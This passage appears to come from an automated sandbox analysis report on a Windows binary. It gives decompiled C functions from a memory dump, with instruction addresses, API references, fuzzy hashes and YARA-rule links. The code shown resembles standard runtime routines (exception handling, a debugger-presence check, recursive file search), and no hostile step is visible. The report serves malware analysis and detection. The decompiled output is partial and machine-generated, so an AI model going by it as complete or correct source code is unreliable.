								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00CA1EF8(_t518);
							L133:
							E00CA159C(_t698 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
							return  *((intOrPtr*)(_t698 + 0x1c));
						}
					}
					L8:
					E00CA3DAB(_t518, _t638);
					goto L133;
				}
				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
				asm("adc eax, ecx");
				_t707 =  *(_t518 + 0x6ca4);
				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
					goto L6;
				} else {
					 *((char*)(_t698 + 0x5f)) = 1;
					E00CA3C40(_t518);
					_push(8);
					_push(_t698 + 0x14);
					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
						goto L8;
					} else {
						_t697 = _t518 + 0x1024;
						E00CA607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
						goto L7;
					}
				}
			}



















































































                0x00ca2692
                0x00ca269b
                0x00ca26a5
                0x00ca26ac
                0x00ca26b3
                0x00ca26b6
                0x00ca26bf
                0x00ca26c2
                0x00ca26c5
                0x00ca26cc
                0x00ca2734
                0x00ca2734
                0x00ca2737
                0x00ca273b
                0x00ca2744
                0x00ca2760
                0x00ca2766
                0x00ca2775
                0x00ca277d
                0x00ca2783
                0x00ca278e
                0x00ca2799
                0x00ca279c
                0x00ca27a2
                0x00ca27a8
                0x00ca27aa
                0x00ca27b8
                0x00ca27b8
                0x00ca27bb
                0x00ca27f0
                0x00ca27bd
                0x00ca27bd
                0x00ca27bd
                0x00ca27c0
                0x00ca27e4
                0x00ca27c2
                0x00ca27c2
                0x00ca27c2
                0x00ca27c5
                0x00ca27d8
                0x00ca27c7
                0x00ca27c7
                0x00ca27ca
                0x00ca27cc
                0x00ca27cc
                0x00ca27ca
                0x00ca27c5
                0x00ca27c0
                0x00ca27fa
                0x00ca2800
                0x00ca2806
                0x00ca2809
                0x00ca280f
                0x00ca2812
                0x00ca281d
                0x00ca2820
                0x00ca2821
                0x00ca2824
                0x00ca2844
                0x00ca284a
                0x00ca2850
                0x00ca2853
                0x00ca2859
                0x00ca285c
                0x00ca285f
                0x00ca2f78
                0x00ca2f80
                0x00ca2f87
                0x00ca2f8e
                0x00ca2f9b
                0x00ca2fad
                0x00ca2fb2
                0x00ca2fb8
                0x00ca2fca
                0x00ca2fd0
                0x00ca2fdd
                0x00ca2fea
                0x00ca2ff7
                0x00ca2ffd
                0x00ca2fff
                0x00ca300c
                0x00ca300e
                0x00ca300e
                0x00ca300f
                0x00ca300f
                0x00ca301b
                0x00ca302b
                0x00ca302b
                0x00ca302e
                0x00ca3034
                0x00ca303a
                0x00ca303c
                0x00ca303d
                0x00ca3042
                0x00ca304a
                0x00ca3050
                0x00ca30d9
                0x00ca30dc
                0x00000000
                0x00ca30dc
                0x00ca3056
                0x00ca305c
                0x00ca305f
                0x00000000
                0x00000000
                0x00ca3061
                0x00ca3064
                0x00000000
                0x00000000
                0x00ca3066
                0x00ca3069
                0x00ca30ab
                0x00ca30b2
                0x00ca30b9
                0x00ca30be
                0x00ca30c2
                0x00000000
                0x00000000
                0x00ca30cb
                0x00ca30d0
                0x00000000
                0x00ca30d0
                0x00ca306b
                0x00ca3072
                0x00000000
                0x00000000
                0x00ca307f
                0x00ca307f
                0x00ca3082
                0x00ca3088
                0x00ca308b
                0x00ca308f
                0x00ca3091
                0x00ca3098
                0x00ca309c
                0x00ca309f
                0x00ca30a2
                0x00ca30a2
                0x00ca30a2
                0x00ca30a7
                0x00ca30a9
                0x00000000
                0x00000000
                0x00000000
                0x00ca30a9
                0x00ca3001
                0x00ca3003
                0x00ca300a
                0x00000000
                0x00000000
                0x00000000
                0x00ca300a
                0x00ca2865
                0x00ca2f4e
                0x00ca2f4e
                0x00ca2f58
                0x00ca2f66
                0x00ca2f6c
                0x00ca2f6c
                0x00000000
                0x00ca2f58
                0x00ca286b
                0x00ca286e
                0x00ca2902
                0x00ca290a
                0x00ca2919
                0x00ca291d
                0x00ca2920
                0x00ca2927
                0x00ca2930
                0x00ca2932
                0x00ca2936
                0x00ca293c
                0x00ca2941
                0x00ca294d
                0x00ca295a
                0x00ca2967
                0x00ca296d
                0x00ca2970
                0x00ca297d
                0x00ca297d
                0x00ca297d
                0x00ca297f
                0x00ca2981
                0x00ca2981
                0x00ca2987
                0x00ca298a
                0x00ca2996
                0x00ca2996
                0x00ca2998
                0x00ca2998
                0x00ca29a3
                0x00ca29a5
                0x00ca29aa
                0x00ca29b0
                0x00ca29b6
                0x00ca29bf
                0x00ca29cf
                0x00ca29cf
                0x00ca29b8
                0x00ca29b8
                0x00ca29ba
                0x00ca29ba
                0x00ca29d1
                0x00ca29e7
                0x00ca29ed
                0x00ca29fb
                0x00ca2a06
                0x00ca2a11
                0x00ca2a14
                0x00ca2a26
                0x00ca2a34
                0x00ca2a3f
                0x00ca2a4f
                0x00ca2a5d
                0x00ca2a60
                0x00ca2a65
                0x00ca2a68
                0x00ca2a6b
                0x00ca2a6e
                0x00ca2a71
                0x00ca2a73
                0x00ca2a75
                0x00ca2a77
                0x00ca2a77
                0x00ca2a75
                0x00ca2a80
                0x00ca2a86
                0x00ca2a8c
                0x00ca2ad1
                0x00ca2ad1
                0x00ca2ad4
                0x00ca2ade
                0x00ca2ae0
                0x00ca2af2
                0x00ca2af2
                0x00ca2afc
                0x00ca2afc
                0x00ca2b02
                0x00ca2b04
                0x00ca2b0e
                0x00ca2b13
                0x00ca2b15
                0x00ca2b17
                0x00ca2b21
                0x00ca2b21
                0x00ca2b13
                0x00ca2b28
                0x00ca2b2b
                0x00ca2b37
                0x00ca2b37
                0x00000000
                0x00ca2b2d
                0x00ca2b2d
                0x00ca2b30
                0x00000000
                0x00000000
                0x00ca2b34
                0x00ca2b39
                0x00ca2b39
                0x00ca2b45
                0x00ca2b45
                0x00ca2b47
                0x00ca2b4d
                0x00ca2b7b
                0x00ca2b7f
                0x00ca2b81
                0x00ca2b83
                0x00ca2b83
                0x00ca2b83
                0x00ca2b86
                0x00ca2b86
                0x00ca2b91
                0x00ca2b97
                0x00ca2b9e
                0x00ca2ba4
                0x00ca2ba6
                0x00ca2bac
                0x00ca2bb3
                0x00ca2bb9
                0x00ca2bc0
                0x00ca2bc6
                0x00ca2bc6
                0x00ca2bcc
                0x00ca2bcf
                0x00ca2bd4
                0x00ca2bd7
                0x00ca2bd9
                0x00ca2bdb
                0x00ca2bdd
                0x00ca2bdd
                0x00ca2beb
                0x00ca2bf0
                0x00ca2bf2
                0x00ca2bf6
                0x00ca2bfd
                0x00ca2c7e
                0x00ca2c88
                0x00ca2c93
                0x00ca2c96
                0x00ca2c9d
                0x00ca2c9f
                0x00ca2c9f
                0x00ca2c9f
                0x00ca2ca2
                0x00ca2ca4
                0x00ca2da6
                0x00ca2caa
                0x00ca2cb3
                0x00ca2cb6
                0x00ca2cc5
                0x00ca2ccf
                0x00ca2cd3
                0x00ca2cda
                0x00ca2cdc
                0x00ca2ce2
                0x00ca2ce9
                0x00ca2cf2
                0x00ca2cf8
                0x00ca2cf9
                0x00ca2d05
                0x00ca2d09
                0x00ca2d0f
                0x00ca2d11
                0x00ca2d19
                0x00ca2d1f
                0x00ca2d21
                0x00ca2d2b
                0x00ca2d2d
                0x00ca2d38
                0x00ca2d40
                0x00ca2d5d
                0x00ca2d6d
                0x00ca2d73
                0x00ca2d76
                0x00ca2d81
                0x00ca2d89
                0x00ca2d8e
                0x00ca2d91
                0x00ca2d94
                0x00ca2d97
                0x00ca2d99
                0x00ca2d9b
                0x00ca2d9e
                0x00ca2d9e
                0x00ca2d99
                0x00ca2ce9
                0x00ca2cdc
                0x00ca2daf
                0x00ca2db6
                0x00ca2db8
                0x00ca2dba
                0x00ca2dba
                0x00ca2bff
                0x00ca2c01
                0x00ca2c04
                0x00ca2c07
                0x00ca2c0e
                0x00ca2c13
                0x00ca2c1f
                0x00ca2c24
                0x00ca2c27
                0x00ca2c29
                0x00ca2c2b
                0x00ca2c3e
                0x00ca2c48
                0x00ca2c48
                0x00ca2c4d
                0x00ca2c4d
                0x00ca2c4d
                0x00ca2c4f
                0x00ca2c52
                0x00ca2c54
                0x00ca2c56
                0x00ca2c5b
                0x00ca2c62
                0x00ca2c63
                0x00ca2c63
                0x00ca2c6b
                0x00ca2c6b
                0x00ca2dc1
                0x00ca2dc8
                0x00ca2dd6
                0x00ca2dd6
                0x00ca2de4
                0x00ca2de9
                0x00ca2df0
                0x00ca2ed4
                0x00ca2ef5
                0x00ca2efe
                0x00ca2f0a
                0x00ca2f10
                0x00ca2f18
                0x00ca2f1a
                0x00ca2f27
                0x00ca2f2e
                0x00ca2f33
                0x00ca2f37
                0x00ca2f44
                0x00ca2f44
                0x00ca2f37
                0x00000000
                0x00ca2df6
                0x00ca2df9
                0x00ca2e07
                0x00ca2e10
                0x00ca2e19
                0x00ca2e1c
                0x00ca2e1e
                0x00ca2e20
                0x00ca2e23
                0x00ca2e25
                0x00ca2e28
                0x00ca2e2b
                0x00ca2e2d
                0x00ca2e35
                0x00ca2e37
                0x00ca2e3a
                0x00000000
                0x00000000
                0x00ca2e40
                0x00ca2e45
                0x00000000
                0x00000000
                0x00ca2e47
                0x00ca2e49
                0x00ca2e58
                0x00ca2e58
                0x00ca2e65
                0x00ca2e6a
                0x00ca2e6d
                0x00ca2e6f
                0x00ca2e6f
                0x00ca2e6f
                0x00ca2e6f
                0x00ca2e72
                0x00ca2e74
                0x00ca2e77
                0x00ca2e77
                0x00ca2e7a
                0x00ca2eab
                0x00ca2eab
                0x00ca2eab
                0x00ca2eb2
                0x00ca2eb9
                0x00ca2ebe
                0x00ca2e7c
                0x00ca2e7e
                0x00ca2e81
                0x00ca2e81
                0x00ca2e84
                0x00ca2e87
                0x00ca2e89
                0x00ca2e96
                0x00ca2e98
                0x00ca2e9e
                0x00ca2ea0
                0x00ca2ea3
                0x00ca2ea3
                0x00ca2ea3
                0x00ca2ea8
                0x00000000
                0x00ca2ea8
                0x00ca2ec1
                0x00ca2ec1
                0x00ca2ec2
                0x00ca2ec5
                0x00ca2ec5
                0x00ca2ece
                0x00ca2ed1
                0x00000000
                0x00ca2ed1
                0x00ca2df0
                0x00ca2b5a
                0x00ca2b5c
                0x00ca2b61
                0x00ca2b65
                0x00ca2b67
                0x00ca2b75
                0x00ca2b77
                0x00000000
                0x00ca2b77
                0x00ca2b69
                0x00ca2b6c
                0x00000000
                0x00000000
                0x00ca2b70
                0x00000000
                0x00ca2b71
                0x00ca2b2b
                0x00ca2ae2
                0x00ca2ae4
                0x00000000
                0x00000000
                0x00ca2ae6
                0x00ca2ae8
                0x00ca2aea
                0x00ca2aea
                0x00000000
                0x00ca2a8e
                0x00ca2a8e
                0x00ca2a8e
                0x00ca2a91
                0x00ca2ac7
                0x00000000
                0x00ca2ac7
                0x00ca2a94
                0x00ca2a94
                0x00ca2a97
                0x00ca2abb
                0x00000000
                0x00ca2abb
                0x00ca2a99
                0x00ca2a99
                0x00ca2a9c
                0x00ca2aaf
                0x00ca2aaf
                0x00000000
                0x00ca2aaf
                0x00ca2a9e
                0x00ca2aa1
                0x00000000
                0x00000000
                0x00ca2aa3
                0x00000000
                0x00ca2aa3
                0x00ca2a8c
                0x00ca298c
                0x00ca298f
                0x00000000
                0x00000000
                0x00ca2993
                0x00000000
                0x00ca2993
                0x00ca2972
                0x00ca2975
                0x00000000
                0x00ca2977
                0x00ca2977
                0x00ca2979
                0x00000000
                0x00ca2979
                0x00ca2975
                0x00ca2874
                0x00ca2877
                0x00000000
                0x00ca287d
                0x00ca2889
                0x00ca2891
                0x00ca2899
                0x00ca28a8
                0x00ca28b0
                0x00ca28b3
                0x00ca28b9
                0x00ca28bf
                0x00ca28c5
                0x00ca28c7
                0x00ca28d1
                0x00ca28d1
                0x00ca28d7
                0x00ca28de
                0x00ca28ec
                0x00ca28ef
                0x00ca28f5
                0x00ca28f5
                0x00000000
                0x00ca28de
                0x00ca2877
                0x00ca2814
                0x00ca281b
                0x00000000
                0x00000000
                0x00000000
                0x00ca281b
                0x00ca280b
                0x00ca280b
                0x00000000
                0x00ca27ac
                0x00ca27ae
                0x00ca30df
                0x00ca30e2
                0x00ca30f0
                0x00ca30fb
                0x00ca30fb
                0x00ca27aa
                0x00ca2746
                0x00ca2748
                0x00000000
                0x00ca2748
                0x00ca26d6
                0x00ca26d8
                0x00ca26da
                0x00ca26e0
                0x00000000
                0x00ca26ec
                0x00ca26ee
                0x00ca26f2
                0x00ca26fc
                0x00ca26fe
                0x00ca2707
                0x00000000
                0x00ca2709
                0x00ca2719
                0x00ca272a
                0x00ca272f
                0x00000000
                0x00ca272f
                0x00ca2707

                APIs
                • __EH_prolog.LIBCMT ref: 00CA269B
                • _strlen.LIBCMT ref: 00CA2C1F
                  • Part of subcall function 00CB0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CAB312,00000000,?,?,?,000202DA), ref: 00CB0FFA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA2D76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                • Opcode ID: 76b04b7a834375c0c01b38f97e6f6aad16fe8805f9f3019a3ac9a73eb95a472e
                • Instruction ID: cda2280d591c7e952eb4a99675e649fd2735a46dc183c992f98db1d4817e0ed7
                • Opcode Fuzzy Hash: 76b04b7a834375c0c01b38f97e6f6aad16fe8805f9f3019a3ac9a73eb95a472e
                • Instruction Fuzzy Hash: 686216715002968FDF28DF78C8957EA37E1EF56308F08457EEC9A8B282D7709A45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC7BE1, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00CC7BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xcdd668; // 0x814d2927
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00CBE690(_t41);
					_pop(_t61);
				}
				E00CBE920(_t66,  &_v804, 0, 0x50);
				E00CBE920(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00CBE690(_t57);
				}
				return E00CBE203(_t57, _v8 ^ _t69);
			}





































                0x00cc7be1
                0x00cc7be1
                0x00cc7be1
                0x00cc7be1
                0x00cc7bec
                0x00cc7bf1
                0x00cc7bf3
                0x00cc7bfb
                0x00cc7bfd
                0x00cc7c00
                0x00cc7c05
                0x00cc7c05
                0x00cc7c11
                0x00cc7c24
                0x00cc7c32
                0x00cc7c38
                0x00cc7c3e
                0x00cc7c44
                0x00cc7c4a
                0x00cc7c50
                0x00cc7c56
                0x00cc7c5c
                0x00cc7c62
                0x00cc7c68
                0x00cc7c6f
                0x00cc7c76
                0x00cc7c7d
                0x00cc7c84
                0x00cc7c8b
                0x00cc7c92
                0x00cc7c93
                0x00cc7c9c
                0x00cc7ca2
                0x00cc7ca2
                0x00cc7ca5
                0x00cc7cab
                0x00cc7cb8
                0x00cc7cc1
                0x00cc7cca
                0x00cc7cd3
                0x00cc7ce1
                0x00cc7ce3
                0x00cc7ce9
                0x00cc7cf8
                0x00cc7d04
                0x00cc7d07
                0x00cc7d0c
                0x00cc7d1b

                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CC7CD9
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CC7CE3
                • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00CC7CF0
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 71378ca5d4eae3935a319883fc319aa20027c2412a14101159fceb888f374142
                • Instruction ID: 20865da6bd3984f4750ba583ea739aeca6cce90cb094380f7ca9af9ecb0914ff
                • Opcode Fuzzy Hash: 71378ca5d4eae3935a319883fc319aa20027c2412a14101159fceb888f374142
                • Instruction Fuzzy Hash: 4F31B175D0122CABCB61DF64D889BDCBBB8AF18710F5046EAE41DA7260E7709F858F44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC9FD3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00CC9FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t104 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t110 = E00CC7B1B(_t84, _t77, 1);
					_pop(_t86);
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t104;
						_t40 = E00CCDD71(_t86, _t110 + _t104, _t77, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00CCA212(_a16, _t100, __eflags, _t110);
							E00CC7A50(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t104);
						_t74 = E00CCDD71(_t86, _t110, _t77, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00CC7DBB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0xcdd668; // 0x814d2927
							_v48 = _t43 ^ _t117;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t110);
							_t111 = _v332.cAlternateFileName;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00CCDDC0(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E00CBE920(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00CC9FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00CC5030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00CC9E2B);
									}
								} else {
									_push(_t55);
									_t57 = E00CC9FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									FindClose(_t112);
								}
								_t58 = _t105;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t111);
									_t58 = E00CC9FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
								}
							}
							__eflags = _v12 ^ _t117;
							return E00CBE203(_t58, _v12 ^ _t117);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}
















































                0x00cc9fd8
                0x00cc9fd9
                0x00cc9fdc
                0x00cc9fdc
                0x00cc9fdf
                0x00cc9fdf
                0x00cc9fe1
                0x00cc9fe2
                0x00cc9feb
                0x00cc9fec
                0x00cc9fef
                0x00cc9ff2
                0x00cc9ff7
                0x00cc9ffe
                0x00cc9fff
                0x00cca000
                0x00cca003
                0x00cca00d
                0x00cca010
                0x00cca011
                0x00cca013
                0x00cca027
                0x00cca027
                0x00cca02a
                0x00cca034
                0x00cca039
                0x00cca03c
                0x00cca03e
                0x00000000
                0x00cca040
                0x00cca044
                0x00cca04d
                0x00cca053
                0x00000000
                0x00cca056
                0x00cca015
                0x00cca015
                0x00cca01b
                0x00cca020
                0x00cca023
                0x00cca025
                0x00cca05c
                0x00cca05e
                0x00cca05f
                0x00cca060
                0x00cca061
                0x00cca062
                0x00cca063
                0x00cca068
                0x00cca06c
                0x00cca06e
                0x00cca074
                0x00cca07b
                0x00cca07e
                0x00cca081
                0x00cca082
                0x00cca085
                0x00cca086
                0x00cca089
                0x00cca08a
                0x00cca0ab
                0x00cca0ab
                0x00cca0ad
                0x00000000
                0x00000000
                0x00cca092
                0x00cca094
                0x00cca096
                0x00cca098
                0x00cca09a
                0x00cca09c
                0x00cca09e
                0x00cca0a9
                0x00000000
                0x00cca0a9
                0x00cca09e
                0x00cca09a
                0x00000000
                0x00cca096
                0x00cca0af
                0x00cca0b1
                0x00cca0b4
                0x00cca0cd
                0x00cca0cd
                0x00cca0cf
                0x00cca0d2
                0x00cca0e2
                0x00cca0e4
                0x00cca0e4
                0x00cca0d4
                0x00cca0d4
                0x00cca0d7
                0x00000000
                0x00cca0d9
                0x00cca0d9
                0x00cca0dc
                0x00000000
                0x00cca0de
                0x00cca0de
                0x00cca0de
                0x00cca0dc
                0x00cca0d7
                0x00cca0ea
                0x00cca0f2
                0x00cca0f6
                0x00cca104
                0x00cca109
                0x00cca11e
                0x00cca120
                0x00cca126
                0x00cca129
                0x00cca15b
                0x00cca15b
                0x00cca15d
                0x00cca160
                0x00cca166
                0x00cca166
                0x00cca16d
                0x00cca187
                0x00cca187
                0x00cca196
                0x00cca19b
                0x00cca19e
                0x00cca1a0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cca16f
                0x00cca16f
                0x00cca175
                0x00cca177
                0x00000000
                0x00cca179
                0x00cca179
                0x00cca17c
                0x00000000
                0x00cca17e
                0x00cca17e
                0x00cca185
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cca185
                0x00cca17c
                0x00cca177
                0x00000000
                0x00cca1a2
                0x00cca1aa
                0x00cca1b0
                0x00cca1b2
                0x00cca1b2
                0x00cca1ba
                0x00cca1bf
                0x00cca1c7
                0x00cca1ca
                0x00cca1cc
                0x00cca1e0
                0x00cca1e5
                0x00cca12b
                0x00cca12b
                0x00cca12f
                0x00cca137
                0x00cca137
                0x00cca137
                0x00cca139
                0x00cca13c
                0x00cca13f
                0x00cca13f
                0x00cca145
                0x00cca0b6
                0x00cca0b9
                0x00cca0bb
                0x00000000
                0x00cca0bd
                0x00cca0bd
                0x00cca0c3
                0x00cca0c8
                0x00cca0bb
                0x00cca14c
                0x00cca157
                0x00000000
                0x00000000
                0x00000000
                0x00cca025
                0x00cc9ff9
                0x00cc9ffb
                0x00cca057
                0x00cca05b
                0x00cca05b
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
